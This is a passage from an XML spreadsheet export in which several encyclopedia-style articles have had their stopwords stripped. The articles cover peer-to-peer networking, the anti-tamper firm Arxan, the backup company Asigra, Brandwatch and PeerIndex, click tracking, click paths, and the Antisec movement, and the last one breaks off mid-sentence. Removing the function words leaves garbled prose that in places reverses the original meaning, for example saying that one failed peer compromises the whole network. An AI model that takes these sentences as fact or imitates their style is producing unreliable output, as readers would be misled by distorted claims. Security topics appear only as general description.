    <t>peer-to-peer (p2p) computing networking distributed application architecture partitions tasks workloads peers. peers equally privileged, equipotent participants network. they said form peer-to-peer network nodes.peers make portion resources, processing power, disk storage network bandwidth, directly available network participants, without need central coordination servers stable hosts. peers suppliers consumers resources, contrast traditional client–server model consumption supply resources divided.while systems previously used many application domains, architecture popularized file sharing system napster, originally released 1999. concept inspired structures philosophies many areas human interaction. social contexts, peer-to-peer meme refers egalitarian social networking emerged throughout society, enabled internet technologies general. historical development while systems previously used many application domains, concept popularized file sharing systems music-sharing application napster (originally released 1999). peer-to-peer movement allowed millions internet users connect "directly, forming groups collaborating become user-created search engines, virtual supercomputers, filesystems." basic concept peer-to-peer computing envisioned earlier software systems networking discussions, reaching back principles stated first request comments, 1.tim berners-lee's vision world wide close network assumed user would active editor contributor, creating linking content form interlinked "web" links. early internet open present day, machines connected internet could send packets without firewalls security measures. this contrasts broadcasting-like structure developed years. precursor internet, arpanet successful client–server network "every participating node could request serve content." however, arpanet self-organized, lacked ability "provide means context content-based routing beyond 'simple' address-based routing."therefore, usenet, distributed messaging system often described early peer-to-peer architecture, established. developed 1979 system enforces decentralized model control. basic model client–server model user client perspective offers self-organizing approach newsgroup servers. however, news servers communicate another peers propagate usenet news articles entire group network servers. consideration applies smtp email sense core email-relaying network mail transfer agents peer-to-peer character, periphery email clients direct connections strictly client–server relationship.in 1999, millions people internet, shawn fanning introduced music file-sharing application called napster. napster beginning peer-to-peer networks, know today, "participating users establish virtual network, entirely independent physical network, without obey administrative authorities restrictions." architecture peer-to-peer network designed around notion equal peer nodes simultaneously functioning "clients" "servers" nodes network. this model network arrangement differs client–server model communication usually central server. typical example file transfer uses client–server model file transfer protocol (ftp) service client server programs distinct: clients initiate transfer, servers satisfy requests. routing resource discovery peer-to-peer networks generally implement form virtual overlay network physical network topology, nodes overlay form subset nodes physical network. data still exchanged directly underlying tcp/ip network, application layer peers able communicate directly, logical overlay links (each corresponds path underlying physical network). overlays used indexing peer discovery, make system independent physical network topology. based nodes linked within overlay network, resources indexed located, classify networks unstructured structured hybrid two). unstructured networks unstructured peer-to-peer networks impose particular structure overlay network design, rather formed nodes randomly form connections other. (gnutella, gossip, kazaa examples unstructured protocols).because structure globally imposed upon them, unstructured networks easy build allow localized optimizations different regions overlay. also, role peers network same, unstructured networks highly robust face high rates "churn"—that large numbers peers frequently joining leaving network.however, primary limitations unstructured networks also arise lack structure. particular, peer wants find desired piece data network, search query must flooded network find many peers possible share data. flooding causes high amount signaling traffic network, uses cpu/memory requiring every peer process search queries), ensure search queries always resolved. furthermore, since correlation peer content managed guarantee flooding find peer desired data. popular content likely available several peers peer searching likely find thing. peer looking rare data shared peers, highly unlikely search successful. structured networks structured peer-to-peer networks overlay organized specific topology, protocol ensures node efficiently search network file/resource, even resource extremely rare. common type structured networks implement distributed hash table (dht), variant consistent hashing used assign ownership file particular peer. this enables peers search resources network using hash table: (key, value) pairs stored dht, participating node efficiently retrieve value associated given key. however, order route traffic efficiently network, nodes structured overlay must maintain lists neighbors satisfy specific criteria. this makes less robust networks high rate churn (i.e. large numbers nodes frequently joining leaving network). more recent evaluation resource discovery solutions real workloads pointed several issues dht-based solutions high cost advertising/discovering resources static dynamic load imbalance.notable distributed networks dhts include tixati, alternative bittorrent's distributed tracker, network, storm botnet, yacy, coral content distribution network. some prominent research projects include chord project, kademlia, past storage utility, p-grid, self-organized emerging overlay network, coopnet content distribution system. dht-based networks also widely utilized accomplishing efficient resource discovery grid computing systems, aids resource management scheduling applications. hybrid models hybrid models combination peer-to-peer client–server models. common hybrid model central server helps peers find other. spotify example hybrid model [until 2014]. there variety hybrid models, make trade-offs centralized functionality provided structured server/client network node equality afforded pure peer-to-peer unstructured networks. currently, hybrid models better performance either pure unstructured networks pure structured networks certain functions, searching, require centralized functionality benefit decentralized aggregation nodes provided unstructured networks. coopnet content distribution system coopnet (cooperative networking) proposed system off-loading serving peers recently downloaded content, proposed computer scientists venkata padmanabhan kunwadee sripanidkulchai, working microsoft research carnegie mellon university. when server experiences increase load redirects incoming peers peers agreed mirror content, thus off-loading balance server. information retained server. this system makes fact bottle-neck likely outgoing bandwidth cpu, hence server-centric design. assigns peers peers 'close neighbors [same prefix range] attempt locality. multiple peers found file designates node choose fastest neighbors. streaming media transmitted clients cache previous stream, transmit piece-wise nodes. security trust peer-to-peer systems pose unique challenges computer security perspective. like form software, applications contain vulnerabilities. what makes particularly dangerous software, however, peer-to-peer applications servers well clients, meaning vulnerable remote exploits. routing attacks since node plays role routing traffic network, malicious users perform variety "routing attacks", denial service attacks. examples common routing attacks include "incorrect lookup routing" whereby malicious nodes deliberately forward requests incorrectly return false results, "incorrect routing updates" malicious nodes corrupt routing tables neighboring nodes sending false information, "incorrect routing network partition" nodes joining bootstrap malicious node, places node partition network populated malicious nodes. corrupted data malware prevalence malware varies different peer-to-peer protocols. studies analyzing spread malware networks found, example, answered download requests gnutella network contained form malware, whereas content openft contained malware. cases, three common types malware accounted large majority cases (99% gnutella, openft). another study analyzing traffic kazaa network found 500,000 file sample taken infected different computer viruses tested for.corrupted data also distributed networks modifying files already shared network. example, fasttrack network, riaa managed introduce faked chunks downloads downloaded files (mostly files). files infected riaa virus unusable afterwards contained malicious code. riaa also known uploaded fake music movies networks order deter illegal file sharing. consequently, networks today seen enormous increase security file verification mechanisms. modern hashing, chunk verification different encryption methods made networks resistant almost type attack, even major parts respective network replaced faked nonfunctional hosts. resilient scalable computer networks decentralized nature networks increases robustness removes single point failure inherent client–server based system. nodes arrive demand system increases, total capacity system also increases, likelihood failure decreases. peer network fails function properly, whole network compromised damaged. contrast, typical client–server architecture, clients share demands system, resources. case, clients join system, fewer resources available serve client, central server fails, entire network taken down. distributed storage search there advantages disadvantages networks related topic data backup, recovery, availability. centralized network, system administrators forces controlling availability files shared. administrators decide longer distribute file, simply remove servers, longer available users. along leaving users powerless deciding distributed throughout community, makes entire system vulnerable threats requests government large forces. example, youtube pressured riaa, mpaa, entertainment industry filter copyrighted content. although server-client networks able monitor manage content availability, stability availability content choose host. client trouble accessing obscure content shared stable centralized network. networks, however, unreliable sharing unpopular files sharing files network requires least node network requested data, node must able connect node requesting data. this requirement occasionally hard meet users delete stop sharing data point.in sense, community users network completely responsible deciding content available. unpopular files eventually disappear become unavailable people stop sharing them. popular files, however, highly easily distributed. popular files network actually stability availability files central networks. centralized network, simple loss connection server clients enough cause failure, networks, connections every node must lost order cause data sharing failure. centralized system, administrators responsible data recovery backups, systems, node requires backup system. because lack central authority networks, forces recording industry, riaa, mpaa, government unable delete stop sharing content systems. applications content delivery networks, clients provide resources. this means unlike client–server systems, content-serving capacity peer-to-peer networks actually increase users begin access content (especially protocols bittorrent require users share, refer performance measurement study). this property major advantages using networks makes setup running costs small original content distributor. file-sharing networks many peer-to-peer file sharing networks, gnutella, edonkey network popularized peer-to-peer technologies. peer-to-peer content delivery networks. peer-to-peer content services, e.g. caches improved performance correli caches software publication distribution (linux distribution, several games); file sharing networks. copyright infringements peer-to-peer networking involves data transfer user another without using intermediate server. companies developing applications involved numerous legal cases, primarily united states, conflicts copyright law. major cases grokster riaa studios, inc. grokster, ltd.. last case, court unanimously held defendant peer-to-peer file sharing companies grokster streamcast could sued inducing copyright infringement. multimedia p2ptv pdtp protocols. some proprietary multimedia applications peer-to-peer network along streaming servers stream audio video clients. peercasting multicasting streams. pennsylvania state university, simon fraser university carrying project called lionshare designed facilitating file sharing among educational institutions globally. osiris program allows users create anonymous autonomous portals distributed network. other applications bitcoin additional ether, peercoin peer-to-peer-based digital cryptocurrencies. dat, distributed version-controlled publishing platform. filecoin open source, public, cryptocurrency digital payment system intended blockchain-based cooperative digital storage data retrieval method. i2p, overlay network used browse internet anonymously. unlike related i2p, network peer-to-peer; however, enable peer-to-peer applications built onion services. interplanetary file system (ipfs) protocol network designed create content-addressable, peer-to-peer method storing sharing hypermedia distribution protocol. nodes ipfs network form distributed file system. jami, peer-to-peer chat app. jxta, peer-to-peer protocol designed java platform. netsukuku, wireless community network designed independent internet. open garden, connection sharing application shares internet access devices using wi-fi bluetooth. resilio sync, directory-syncing app. research like chord project, past storage utility, p-grid, coopnet content distribution system. syncthing, directory-syncing app. tradepal m-commerce applications power real-time marketplaces. u.s. department defense conducting research networks part modern network warfare strategy. may, 2003, anthony tether, director darpa, testified united states military uses networks. webtorrent streaming torrent client javascript browsers, well webtorrent desktop stand alone version bridges webtorrent bittorrent serverless networks. microsoft windows uses proprietary peer peer technology called "delivery optimization" deploy operating system updates using end-users either local network pcs. according microsoft's channel 30%-50% reduction internet bandwidth usage. artisoft's lantastic built peer-to-peer operating system. machines servers workstations time. hotline communications hotline client built decentralized servers tracker software dedicated type files still operates today social implications incentivizing resource sharing cooperation cooperation among community participants continued success systems aimed casual human users; reach full potential large numbers nodes contribute resources. current practice, networks often contain large numbers users utilize resources shared nodes, share anything (often referred "freeloader problem"). freeloading profound impact network cases cause community collapse. types networks "users natural disincentives cooperate cooperation consumes resources degrade performance." studying social attributes networks challenging large populations turnover, asymmetry interest zero-cost identity. variety incentive mechanisms implemented encourage even force nodes contribute resources.some researchers explored benefits enabling virtual communities self-organize introduce incentives resource sharing cooperation, arguing social aspect missing today's systems seen goal means self-organized virtual communities built fostered. ongoing research efforts designing effective incentive mechanisms systems, based principles game theory, beginning take psychological information-processing direction. privacy anonymity some peer-to-peer networks (e.g. freenet) place heavy emphasis privacy anonymity—that ensuring contents communications hidden eavesdroppers, identities/locations participants concealed. public cryptography used provide encryption, data validation, authorization, authentication data/messages. onion routing network protocols (e.g. tarzan) used provide anonymity.perpetrators live streaming sexual abuse cybercrimes used peer-to-peer platforms carry activities anonymity. political implications intellectual property illegal sharing although peer-to-peer networks used legitimate purposes, rights holders targeted peer-to-peer involvement sharing copyrighted material. peer-to-peer networking involves data transfer user another without using intermediate server. companies developing applications involved numerous legal cases, primarily united states, primarily issues surrounding copyright law. major cases grokster riaa studios, inc. grokster, ltd. cases file sharing technology ruled legal long developers ability prevent sharing copyrighted material. establish criminal liability copyright infringement peer-to-peer systems, government must prove defendant infringed copyright willingly purpose personal financial gain commercial advantage. fair exceptions allow limited copyrighted material downloaded without acquiring permission rights holders. these documents usually news reporting lines research scholarly work. controversies developed concern illegitimate peer-to-peer networks regarding public safety national security. when file downloaded peer-to-peer network, impossible know created file users connected network given time. trustworthiness sources potential security threat seen peer-to-peer systems.a study ordered european union found illegal downloading lead increase overall video game sales newer games charge extra features levels. paper concluded piracy negative financial impact movies, music, literature. study relied self-reported data game purchases illegal download sites. pains taken remove effects false misremembered responses. network neutrality peer-to-peer applications present core issues network neutrality controversy. internet service providers (isps) known throttle file-sharing traffic high-bandwidth usage. compared browsing, e-mail many uses internet, data transferred short intervals relative small quantities, file-sharing often consists relatively heavy bandwidth usage ongoing file transfers swarm/network coordination packets. october 2007, comcast, largest broadband internet providers united states, started blocking applications bittorrent. their rationale mostly used share illegal content, infrastructure designed continuous, high-bandwidth traffic. critics point networking legitimate legal uses, another large providers trying control content internet, direct people towards client–server-based application architecture. client–server model provides financial barriers-to-entry small publishers individuals, less efficient sharing large files. reaction bandwidth throttling, several applications started implementing protocol obfuscation, bittorrent protocol encryption. techniques achieving "protocol obfuscation" involves removing otherwise easily identifiable properties protocols, deterministic byte sequences packet sizes, making data look random. isp's solution high bandwidth caching, stores part files accessed clients order save access internet. current research researchers used computer simulations understanding evaluating complex behaviors individuals within network. "networking research often relies simulation order test evaluate ideas. important requirement process results must reproducible researchers replicate, validate, extend existing work." research cannot reproduced, opportunity research hindered. "even though simulators continue released, research community tends towards handful open-source simulators. demand features simulators, shown criteria survey, high. therefore, community work together features open-source software. this would reduce need custom simulators, hence increase repeatability reputability experiments."besides stated facts, work done ns-2 open source network simulator. research issue related free rider detection punishment explored using ns-2 simulator here. also references external links</t>
  </si>
  <si>
    <t>Arxan Technologies</t>
  </si>
  <si>
    <t>digital (formerly known arxan technologies) american technology company specializing anti-tamper digital rights management (drm) internet things (iot), mobile, applications. arxan's security products used prevent tampering reverse engineering software, thus preventing access modifications said software deemed undesirable developer. company reports applications secured running million devices. products used across range industries, including mobile payments banking, automotive, healthcare gaming. history arxan privately held private equity-backed. fall 2013, associates, private equity firm, completed majority investment arxan technologies. previously, company received series funding 2003, followed million series funding 2007 series funding million 2009. early investors included trident capital, ventures, legend ventures, paladin capital, dunrath capital, fund solstice capital. arxan founded 2001 eric davis purdue university researchers, mikhail atallah, korb, john rice chang. first funding came richard early dunrath capital. rich early subsequently became arxan's first ceo. company's early intellectual property licensed purdue university. company's initial focus defense anti-tamper applications. following sale defense technology unit, arxan defense systems, microsemi 2010, arxan focused commercial applications. april 2020, arxan technologies joined collabnet versionone xebialabs form digital.ai, software company stated 'pulling software development, business agility application security single platform'. products arxan offers number anti-tamper software products application cryptographic protection. these include: arxan code protection secure mobile, embedded, desktop server applications arxan cryptographic data protection secure secret keys data white-box cryptography, provide major crypto algorithms features required protect sensitive keys data hostile untrusted operational environments. arxan cryptographic data protection fips140-2 validated.in 2012, company announced comprehensive support android application protection hardening tampering piracy. june 2014, arxan announced mobile application protection offerings sold part ibm's portfolio security products. arxan's products based patented security techniques code hardening, tamper-proofing, security node locking. core technology consists multi-layered, interconnected network guards perform specific security function embedded application binaries make programs tamper-aware, tamper-resistant, self-healing. company claims three-layer protection paradigm defend, detect react differentiating approach. detecting attack attempted responding detected attacks alerts repairs, protection helps secure software hacking attacks threats static reverse engineering code analysis dynamic reverse engineering debugging tampering disable circumvent security mechanisms (authentication, encryption, anti-virus, security policies, etc.) tampering modify program functionality tampering piracy unauthorized insertion malware application counterfeiting theft stealing cryptographic keys anti-tamper arxan's products insert anti-tamper protection firmware device itself, causing parts code continually check integrity. tamper attempt detected, arxan's product either attempt restore code original form, stop firmware running entirely, send notification developer combination three. solutions compared competitor denuvo, working provide layer anti-tamper security already existing copy protection mechanisms added developer. this results multi-layered approach original software protects software unauthorized copying, modification use, arxan prevents attempt remove alter said protection. however, much like denuvo's application approach also criticised increasing system resources. arxan previously expressed strong confidence solutions would cracked, fact cracks bypasses arxan products shown exist; example tycoon ultimate animal collection successfully cracked 2018 using five-layer approach featuring uwp, xbla, msstore, eappx arxan protection simultaneously. several bypasses arxan's protection since emerged 2018 2019, arxan-protected gears cracked scene group less weeks following original release. media awards deloitte 2014 fastest growing technology company cioreview magazine 2014 most promising companies 2015 mobile innovations award winner best management mobile security issues info security products guide 2014 winner best product: mobile application integrity protection™ suite also tamper resistance application security encryption content protection digital rights management cryptographic types obfuscated code cryptography references</t>
  </si>
  <si>
    <t>Asigra</t>
  </si>
  <si>
    <t>asigra inc. company produces cloud backup recovery software platform known asigra cloud backup. company privately held headquartered toronto, canada. history company founded 1986 david farajun hard-drive failure caused loss company's data. decided develop technology back data secure location communication lines, hence establishing asigra. name asigra comes spanish infinitive asegurar, meaning assure. business model asigra sells products value added resellers, managed service providers, telcos, software cloud backup services consumers, small medium businesses large enterprises.these service providers free structure business operations, pricing, cloud deployment models independently. they choose sell software service (saas) either physical virtual appliance customers cloud deployment models public, private, hybrid. product asigra cloud backup company's product. contains various backup recovery modules, based data sources need backed price product based amount data stored compressed, deduplicated encrypted form backup repository. alliances netapp asigra sell data protection service (dpaas) cloud services providers. company also developed products cisco intel, designed distributed remote offices small medium business spaces, respectively.the asigra platform runs smartcloud infrastructure service (iaas) platform back recover data machines smartcloud. licensing models asigra introduced patent pending recovery license model® (rlm) july 2013 address rising storage costs stemming growing data volume. this licensing model allows users based data recovered. capacity license model (clm), introduced 1992, based amount data stored prevalent pricing model used market today vendors backup recovery industry. asigra provides organizations option choose current based organizations' business needs. awards recognition asigra software featured gartner magic quadrant enterprise backup recovery software years row.it various awards, including 2012 north american product innovation award cloud-based data management frost sullivan, storage magazine gold "product year" enterprise backup category, star rating channel partner program magazine. references external links asigra</t>
  </si>
  <si>
    <t>PeerIndex</t>
  </si>
  <si>
    <t>brandwatch social media suite company owned cision. brandwatch sells different solutions: consumer intelligence social media management.consumer intelligence made three different products: consumer research add-ons vizia reviews. consumer research archives social media data million online sources provide companies means conduct market research analyse brands' online presence among cases. social media management made eight different products: publish, advertise, measure, benchmark, influence, engage, audience, listen. much solution made products formerly sold falcon.io suite. falcon.io acquired cision january 2019 merged brandwatch 2022. history 1999, runtime collective ltd, web-engineering company, incorporated giles palmer. 2005, company launched magpie search alert, search engine finding documents financial statements patents. 2007, relaunched brandwatch, instead focused tracking social media mentions social advertising impact. investment company received million venture capital nauta capital march 2012. march 2014, brandwatch partnered gnip, social media company, release application would allow users access social data analytics. 2014, brandwatch gained million round funding highland capital. september 2015, brandwatch launched french website., october 2015, brandwatch raised million series funding, partech investors, invest growth february 2021, brandwatch acquired cision. peerindex acquisition peerindex london-based company, founded azeem azhar, providing social media analytics based footprints major social media services. part emerging group social media analytics providers, peerindex helped social media contributors assess score influence benefit social capital built peerindex tracked approximately million twitter profiles, making company leaders sector.brandwatch acquired peerindex december 2014. with peerindex technology, brandwatch created audiences product, released july 2016. buzzsumo acquisition buzzsumo content marketing research analysis tool, first version released september 2014. brandwatch acquired buzzsumo october 2017. crimson hexagon merger crimson hexagon social intelligence company competitor brandwatch. companies merged october 2018, combining technology customer base $100m business. brandwatch consumer research following brandwatch-crimson hexagon merger, companies' technology combined create brandwatch consumer research. this product would replace brandwatch analytics crimson hexagon's forsight. qriously acquisition qriously mobile market research, polling, survey tool. tool notable predicting highly accurate prediction labour party (uk)'s vote share 2017 united kingdom general election. qriously, along kantar opinium research, also praised 2019 united kingdom general election prediction.qriously acquired brandwatch march 2019. longer available clients. cision acquisition brandwatch acquired 2021 cision 450m usd. falcon.io merge falcon.io acquired cision january 2019 merged brandwatch 2022. products formerly sold part falcon.io suite within brandwatch’s social media management solution. overview brandwatch subscription-based service 7,500 clients.brandwatch offices across world, including york, london, brighton, copenhagen, berlin, sofia, paris, singapore, sydney. similar metrics cloze.com commun.it engagio klout score references external links official website</t>
  </si>
  <si>
    <t>Click tracking</t>
  </si>
  <si>
    <t>click tracking user click behavior user navigational behavior collected order derive insights fingerprint users. click behavior commonly tracked using server logs encompass click paths clicked urls (uniform resource locator). this often presented standard format including information like hostname, date, username. however, technology develops, software allows depth analysis user click behavior using hypervideo tools. given internet considered risky environment, research strives understand users click certain links others. research also conducted explore user experience privacy making user personal identification information individually anonymized improving data collection consent forms written structured.click tracking relevant several industries including human-computer interaction (hci), software engineering, advertising. email tracking, link tracking, analytics, user research also related concepts applications click tracking. common utilization click data click tracking improve results' positions search engines make order relevant users' needs. click tracking employs many modern techniques machine learning data mining. tracking recording technology tracking recording technologies (trts) split categories, institutional trts end-user trts. institutional trts end-user trts differ collecting storing data, respectively understood institutions users. examples trts include radio frequency identification (rfid), credit cards, store video cameras. research suggests individuals concerned privacy, less concerned trts used daily. this discrepancy attributed public understanding information getting collected.another means obtaining user input eye-tracking gaze tracking. gaze-tracking technology especially beneficial motor disabilities. systems employ gaze-tracking often mimic cursor keyboard behavior. process, gaze-tracking system separated panel system interface, user experience system compromised individuals switch panel interface features. experience also difficult users first imagine complete task using keyboard cursor features employ gaze. this causes tasks take additional time. hence, researchers created browser called gazetheweb (gtw), focus research user experience. they improved interface incorporate gaze better.eye-movement tracking also applied usability testing creating applications. however, order track user movements, setting appropriate equipment often required. mouse keyboard activity measured remotely, quality capitalized usability testing. algorithms mouse movements predict trace user movements. such tracking remote environment denoted remote logging technique. browser fingerprinting another means identifying users tracking them. process, information user collected browser create browser fingerprint. browser fingerprint contains information device, operating system, browser, configuration. http headers, javascript, browser plugins used build fingerprint. browser fingerprints change time automatic software updates user browser preference adjustments. measures increase privacy realm reduce functionality blocking features. methods click tracking user browsing behavior often tracked using server access logs contain patterns clicked urls, queries, paths. however, modern tracking software utilizes javascript order track cursor behavior. collected mouse data used create videos, allowing user behavior replayed easily analyzed. hypermedia used create visualizations allow behavior like highlighting, hesitating, selecting monitored. technology used record behavior also used predict monitoring tools, smt2є, collects fifteen cursor features uses fourteen predict last feature's outcome. this software also generates analysis summarizes user cursor activity.in search session, users identified using cookies, identd protocol, address. this information stored database, every time user visits page again, click behavior appended database. doubleclick inc. example company database partners companies mining. cookies added http (hypertext transfer protocol), user clicks link, connected associated server. this action user clicking link seen request, server “responds” sending user's information, information cookie. cookies provide “bookmark” users’ sessions website, store user login information pages users visit website. this aids preserving state session. server, information must consistent among servers; hence, information transferred. data collected cookies used improve websites users also aids user profiling advertising.when data mining techniques statistical procedures applied understand data, process noted analysis usage mining. this helps determining patterns users’ navigational behaviors. some features observed include long users viewed pages for, click path lengths, number clicks. usage mining three phases. first, data "preprocessed" users search sessions’ content. then, tools like association clustering applied look patterns, lastly, patterns saved analyzed. tool association rule mining helps finding “patterns, associations, correlations” among pages users visit search session. sequential pattern discovery association rule mining, also accounts time like page views allotted time period. classification tool allows pages added groups representing certain similar qualities.some examples tools individuals conducting click analytics google analytics tool in-page analytics, clickheat, crazy egg. these tools create visual user click data webpage. clickheat crazy showcase density user clicks using specific colors, tools allow webpage visitors categorized groups qualities like mobile user using particular browser. specific groups' data analyzed insight. click behaviour main factors users consider clicking links link's position list results. closer links top, likely selected users. when users personal connection subject matter tend click article frequently. pictures, position, specific individuals news content also heavily influenced users’ decisions. source news deemed less important.click attitude click intention play large role user click behavior. study research participants presented positive negative insurance advertisement photographs, emotion seen positive association click intention click attitude. researchers also observed click attitude affects click intention, positive emotion impact negative emotion click attitude.the internet considered risky environment abundance cybersecurity attacks occur prevalence malware. hence, whenever individuals internet, decide whether click various links. 2018 study found users tend click urls websites familiar with; user trait exploited cybercriminals, personal information compromised. hence, trust seen also increase click-through intention. when given google chrome warnings, time people click through. they also tend adjust default computer settings process. users also found better recognize malware risks greater potential revealing personal information. relevance search results pages viewed users particular search session constitute click data. such data used improve search results ways, explicit implicit feedback. explicit feedback users indicate pages relevant search query, implicit feedback user behavior interpreted determine results’ relevance. certain user actions webpage used part interpretation process include bookmarking, saving, printing particular page. through collecting click data individuals, relevance results users given queries improve. search session, user indicates documents interested clicks, indicates relevant search. relevant click data determine relevance results often last viewed page rather pages clicked search session. click data outside search sessions also used improve accuracy relevant results users.the search results given query usually subject positional bias. this users tend select links result lists. however, position mean result relevant since relevance change time. part machine learning approach improving result order, human editors begin supplying original rank result algorithm. then, live user click feedback form tracked click-through rates (ctr) search sessions used rerank results based data. this improves order results based live indicated relevance users.click dwell time click sequence information also used improve relevance search results. click dwell time long user takes return search engine results page (serp) clicking particular result, indicate satisfied user particular result. eye-tracking research indicates users exhibit abundance non-sequential viewing activity looking search results. click models abide “top-down” user click behavior cannot interpret user process revisiting pages. extensions advertising supply-demand mismatch costs reduced click tracking. huang defines strategic customers “forward looking” individuals know clicks tracked expect companies engage appropriate business activities. conducted study, researchers used clickstream data customers observe preferences desired product quantities. noisy clicks customers click actually product. this leads imperfect advanced demand information adi.click tracking used realm advertising, potential tool used negatively. publishers display advertisements websites, receive money depending amount traffic, measured number clicks, send advertisers website. click fraud publishers fake clicks generate revenue themselves. 2012 fraud detection mobile advertising (fdma) conference, competition teams tasked data mining machine learning techniques determine “fraudulent publishers” given dataset. successful algorithm able observe morning night click traffic patterns. when density clicks main patterns, often indicator fraudulent publisher.website content adjusted make specific users using “user navigational behavior” user interests process called personalization. personalization useful realm e-commerce. there unique steps process personalization, first step noted “user profiling.” step, user understood constituted click behavior, preferences, qualities. following user profiling “log analysis usage mining.” email phishing usually administered emails, user clicks phishing attempt email, information leaked particular websites. spear-phishing “targeted” form phishing user information used personalize emails entice users click. some phishing emails also contain links attachments. once either clicked downloaded, users’ privacy encroached. conducted study psychological “weapons influence” “life domains” affect users phishing attempts, found scarcity influential factor weapon influence, legal domain influential life domain. also important factor determining susceptible clicking phishing attempts.when virus infects computer, finds email addresses sends copies emails. these emails usually contain attachment sent several individuals. this differs user email account behavior users tend particular network communicate regularly. researchers studied email mining toolkit (emt) could used detect viruses studying user email account behavior found easier decipher quick, broad viral propagations comparison slow, gradual viral propagations.in order know emails users opened, email senders engage email tracking. merely opening email, users' email addresses leaked third parties, users click links within emails, email address leaked larger number third parties. also, time user opens email sent them, information sent third party among address already leaked many third party email trackers also involved tracking, leading user profiling. privacy privacy-protection models anonymize data sent server stored database. hence, user personal identification information still collected, collection process based users trusting servers. researchers study giving users control information sent mobile devices. they also observe giving users control information represented databases realm trajectory data, create system allows approach. this approach gives users potential increase privacy.when user privacy going encroached, consent forms often distributed. type user activity required forms effect much information user retains form. karegar compares simple agree/disagree format forms incorporate checkboxes, drag drop (dad), swipe features. when testing information users would agree disclose consent form formats, researchers observed users presented forms greater number eye-fixations given consent form.when third-party associated first-party website mobile application, anytime user visits first party website mobile application, information sent third-party. third-party tracking generates privacy concerns first-party tracking allows many website application records particular user combined, yielding better user profiles. binns found among 5000 popular websites, websites alone 2000 trackers. 2000 embedded trackers, used websites. researchers evaluated reach third-party trackers based contact users rather websites, "popular" trackers received information highest number people rather code embedded first-parties. google facebook deemed first second largest trackers, google twitter deemed first second largest mobile trackers. also click path click analytics analytics phishing analysis software mining search session references</t>
  </si>
  <si>
    <t>Click path</t>
  </si>
  <si>
    <t>click path clickstream sequence hyperlinks website visitors follows given site, presented order viewed. visitor's click path start within website separate third party website, often search engine results page, continues sequence successive webpages visited user. click paths take call data match sources, keywords, and/or referring domains, order capture data.clickstream analysis useful activity analysis, software testing, market research, analyzing employee productivity. information storage while navigating world wide web, "user agent" (web browser) makes requests another computer, known server, every time user selects hyperlink. most servers store information sequence links user "clicks through" visiting websites host files site operator's benefit. information interest vary include information downloaded, webpage visited previously, webpage visited afterwards, duration time spent page, etc. information useful client/user identified, done website registration record matching client's internet service provider (isp). storage also occur router, proxy server, server. data analysis data mining, column-oriented dbms, integrated olap systems used conjunction clickstreams better record analyze data. privacy clickstream data raise privacy concerns, especially since internet service providers resorted selling users' clickstream data enhance revenue. there 10-12 companies purchase data, typically $0.40/month user. while practice directly identify individual users, often possible indirectly identify specific users, example search data scandal. most consumers unaware practice, potential compromising privacy. addition, isps publicly admit practice.as world online shopping grows, becoming easier privacy individuals become exploited. there many cases email addresses, phone numbers, personal information stolen illegally shoppers, clients, many used third parties. these third parties range advertisers hackers. there consumers actually benefit gaining targeted advertising deals, harmed lack privacy. world technology grows, consumers risk losing privacy. applications clickstreams used allow user allow easily return page already visited, function already incorporated browsers. clickstream display specific time position individuals browsed closed website, pages viewed, duration spent page, also show pages viewed frequently. there abundant information analyzed, individuals check visitors clickstream association statistical information, visiting length, retrieval words, isp, countries, explorers, etc. this process enables individuals know visitors deeply.webmasters gain insight visitors site using clickstream. this data "neutral" sense dataset neutral. data used various scenarios, marketing. additionally, webmaster, researcher, blogger person website learn improve site. growing e-commerce industry made necessary tailor needs preferences consumers. click path data used personalize product offerings. using previous click path data, websites predict products user likely purchase. click path data contain information user's goals, interests, knowledge therefore used predict future actions decisions. using statistical models, websites potentially increase operating profits streamlining results based user likely purchase.analyzing data clients visit company website important order remain competitive. this analysis used generate findings company, first analysis user's clickstream using website reveal usage patterns, turn gives heightened understanding customer behaviour. this analysis creates user profile aids understanding types people visit company's website. discussed poel buckinx (2005), clickstream analysis used predict whether customer likely purchase e-commerce website. clickstream analysis also used improve customer satisfaction website company itself. this generate business advantage, used assess effectiveness advertising page site. opinions researchers stand behind click path analysis note "the path analytical method estimates system equations specify possible causal linkages among variables." further click paths enable researchers break correlations among variables direct indirect spurious components. finally click path analysis "helps researchers disentangle complex interrelationships among variables identify significant pathways involved predicting outcome". even advantages technique still critiqued many large margin error. model must assume variable exact manifestation theoretical concepts underlying reasonably free measurable error". another "casualty hypothesized model path must flow direction feedback loops bidirectional causality), otherwise model cannot solved ordinary least squares regression techniques". lastly, models based correlations, path analysis "cannot demonstrate causality direction causal effects". limitations, many believe click path analysis tends waste time, money, resources. implications most websites store data visitors site click path. information typically used improve website deliver personalized relevant content. addition, data results used designer review, improve redesign website, also used model user's browsing behaviour. online world e-commerce, information collected click path allows advertisers construct personal profiles individually target consumers much effectively ever before; result, advertisers create relevant advertising efficiently spend advertising dollars. meanwhile, wrong hands click path data poses serious threat personal privacy.unauthorized clickstream data collection considered spyware. however, authorized clickstream data collection comes organizations opt-in panels generate market research using panelists agree share clickstream data companies downloading installing specialized clickstream collection agents. challenges number paths user potentially take greatly increases depending number pages particular website. many tools determine path analysis linear account complexity internet usage. cases, less users follow common path. however, even users used path, still tell page influential determining behavior. even linear forms path analysis, customers drop website, "why?" factor still missed. main challenge path analysis lies fact tries regulate force users follow certain path, reality users diverse specific preference opinions. also keystroke logging phorm real-time marketing software asset management click tracking references</t>
  </si>
  <si>
    <t>Antisec Movement</t>
  </si>
  <si>
    <t>anti security movement (also written antisec anti-sec) movement opposed computer security industry. antisec full disclosure information relating software vulnerabilities, exploits, exploitation techniques, hacking tools, attacking public outlets distribution points information. general thought behind computer security industry uses full disclosure profit develop scare-tactics convince people buying firewalls, anti-virus software auditing services.movement followers identified targets cause: websites securityfocus, securiteam, packet storm, milw0rm, mailing lists like "full-disclosure", "vuln-dev", "vendor-sec" bugtraq, public forums channels.in 2009, attacks security communities astalavista milw0rm, popular image-host imageshack, given movement worldwide media attention. history start public attacks name anti-security movement started around 1999. "anti-security movement" understood today coined following document initially index anti.security.is website. purpose movement encourage policy anti-disclosure among computer network security communities. goal ultimately discourage publication security-related news developments, rather, stop disclosure unknown non-public exploits vulnerabilities. essence, would stop publication private materials could allow script kiddies compromising systems unknown methods. open-source movement invaluable tool computer world, indebted open-source wonderful concept exist forever, educational, scientific, end-user software free available everybody. exploits, hand, fall broad category. just like munitions, span cryptographic algorithms hand guns missiles, spread without control export restrictions, exploits released mass public millions internet users. digital holocaust occurs time exploit appears bugtraq, kids across world download target unprepared system administrators. quite frankly, integrity systems world wide ensured 